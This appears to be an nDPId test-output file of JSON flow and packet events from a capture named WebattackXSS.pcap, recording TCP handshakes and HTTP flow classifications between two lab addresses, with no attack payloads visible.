+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347537591,"flow_last_seen":1499347537591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347537591,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1499347537591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347537591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UmRAAD4Gc2ysEAABwKgKMuOMAFC1fUYeAAAAAKACchBp1gAAAgQFtAQCCAoBOxR6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":2,"flow_last_seen":1499347537591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347537591,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ44xyZUlKtX1GH6AScSDFMQAAAgQFtAQCCAoD5OXvATsUegEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":3,"flow_last_seen":1499347537592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347537592,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UmVAAD4Gc3OsEAABwKgKMuOMAFC1fUYfcmVJS4AQAOVkOQAAAQEICgE7FHoD5OXv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347540145,"flow_last_seen":1499347540145,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347540145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1499347540145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347540145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BSZAAD4GwKqsEAABwKgKMuOmAFDsIBPeAAAAAKACchBi2wAAAgQFtAQCCAoBOxb4AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4775,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":2,"flow_last_seen":1499347540145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347540145,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ46adBfH37CAT36AScSDoagAAAgQFtAQCCAoD5OhtATsW+AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4776,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":3,"flow_last_seen":1499347540146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347540146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BSdAAD4GwLGsEAABwKgKMuOmAFDsIBPfnQXx+IAQAOWHcgAAAQEICgE7FvgD5Oht"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347541398,"flow_last_seen":1499347541398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347541398,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1499347541398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347541398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WJdAAD4GbTmsEAABwKgKMuO0AFCKGUCmAAAAAKACchCW0wAAAgQFtAQCCAoBOxgxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":2,"flow_last_seen":1499347541398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347541398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ47RdwzayihlAp6AScSAVsQAAAgQFtAQCCAoD5OmnATsYMQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":3,"flow_last_seen":1499347541399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347541399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WJhAAD4GbUCsEAABwKgKMuO0AFCKGUCnXcM2s4AQAOW0uAAAAQEICgE7GDED5Omn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4797,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347542648,"flow_last_seen":1499347542648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347542648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4797,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1499347542648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347542648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80V9AAD4G9HCsEAABwKgKMuPCAFCPt8g1AAAAAKACchAIXwAAAgQFtAQCCAoBOxlqAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":2,"flow_last_seen":1499347542648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347542648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ48Js\/FwIj7fINqAScSBRdQAAAgQFtAQCCAoD5OrfATsZagEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":3,"flow_last_seen":1499347542649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347542649,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00WBAAD4G9HesEAABwKgKMuPCAFCPt8g2bPxcCYAQAOXwfAAAAQEICgE7GWoD5Orf"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347545176,"flow_last_seen":1499347545176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347545176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1499347545176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347545176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HVZAAD4GqHqsEAABwKgKMuPcAFAahQa0AAAAAKACchA8gQAAAgQFtAQCCAoBOxviAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":2,"flow_last_seen":1499347545176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347545176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ49weXgmaGoUGtaAScSAkLAAAAgQFtAQCCAoD5O1XATsb4gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":3,"flow_last_seen":1499347545177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347545177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HVdAAD4GqIGsEAABwKgKMuPcAFAahQa1Hl4Jm4AQAOXDMwAAAQEICgE7G+ID5O1X"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347546427,"flow_last_seen":1499347546427,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1499347546427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347546427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q6tAAD4GgiWsEAABwKgKMuPqAFBqhV6wAAAAAKACchCTPQAAAgQFtAQCCAoBOx0bAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4828,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":2,"flow_last_seen":1499347546428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347546428,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4+qNxgXIaoVesaAScSAOGQAAAgQFtAQCCAoD5O6QATsdGwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":3,"flow_last_seen":1499347546428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347546428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q6xAAD4GgiysEAABwKgKMuPqAFBqhV6xjcYFyYAQAOWtIAAAAQEICgE7HRsD5O6Q"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347547687,"flow_last_seen":1499347547687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347547687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1499347547687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89IlAAD4G0UasEAABwKgKMuP4AFDYf+rfAAAAAKACchCXygAAAgQFtAQCCAoBOx5WAAAAAAEDAwc="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":2,"flow_last_seen":1499347547687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4\/gRtWE22H\/q4KAScSAyDgAAAgQFtAQCCAoD5O\/LATseVgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4841,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":3,"flow_last_seen":1499347547688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347547688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09IpAAD4G0U2sEAABwKgKMuP4AFDYf+rgEbVhN4AQAOXRFQAAAQEICgE7HlYD5O\/L"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347550209,"flow_last_seen":1499347550209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347550209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1499347550209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347550209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eyFAAD4GSq+sEAABwKgKMuQSAFDq3lvtAAAAAKACchARzgAAAgQFtAQCCAoBOyDMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":2,"flow_last_seen":1499347550209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347550209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5BLEGGHa6t5b7qAScSD2kwAAAgQFtAQCCAoD5PJBATsgzAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4859,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":3,"flow_last_seen":1499347550210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347550210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eyJAAD4GSrasEAABwKgKMuQSAFDq3lvuxBhh24AQAOWVmwAAAQEICgE7IMwD5PJB"} 